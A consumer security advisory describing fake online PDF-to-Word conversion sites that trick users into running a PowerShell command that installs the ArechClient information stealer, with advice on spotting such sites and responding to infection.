A growing threat is targeting unsuspecting internet users through fake PDF conversion tools, with hackers using these deceptive services to spread malware and steal sensitive information. Cybercriminals are increasingly exploiting the popularity of online file conversion, particularly PDF to Word (DOCX) conversions, to distribute information-stealing malware. Security experts and law enforcement agencies are warning users to be cautious when using free online file converters.

The scheme often begins with users searching for a free online tool to convert files, such as a PDF to a DOCX document. Cybercriminals create websites that mimic legitimate file conversion services, sometimes using similar-looking domain names and user interfaces to further deceive users. These fake websites prompt users to upload a PDF file for conversion, and to gain the user's trust, they display an animated loading sequence. Some sites also include a CAPTCHA verification step, which further enhances the perceived legitimacy of the website.

Once the user completes the CAPTCHA, the fake website prompts them to run a PowerShell command on their system. This is a critical step in the attack, as it initiates the malware delivery process. When users run the command, a file, often named "adobe.zip" or something similar, is downloaded onto their system. This ZIP file contains the malware, which in some cases, is the ArechClient malware, an information stealer that belongs to the SectopRAT family. This particular trojan has been active since 2019 and is designed to steal personal information, such as browser passwords and cryptocurrency wallet information.

The malware can also gather personal identifying information (PII), including Social Security Numbers (SSN), financial information like banking credentials, other passwords and session tokens that could allow the scammers to bypass multi-factor authentication (MFA), and email addresses.

Cybercriminals may pursue several scenarios once they have access to a user's system. They might encourage the user to download a tool to perform the conversion, but this tool is actually the malware itself. They might recommend installing a browser extension, which could be a browser hijacker or adware. In more sophisticated attacks, the converted file contains malware code that downloads and installs an information stealer, infecting the device of everyone who opens it.

To protect against these threats, users should exercise caution when using online file conversion services. It is important to verify the legitimacy of the website before uploading any files or running any commands. Look for signs of imitation, such as domain names that are slightly different from well-known services. Be wary of prompts to run PowerShell commands or download executable files.

If you suspect that you have been a victim of this scam, it is important to take immediate action. Contact your financial institutions, change all your passwords using a clean and trusted device, and report the incident to the FBI Internet Crime Complaint Center (IC3) at www.ic3.gov. Run an up-to-date antivirus scan to check for potentially malicious software installed by the scammers, or consider taking your computer to a professional specializing in virus and malware removal services. The best defense is to be aware and exercise caution online.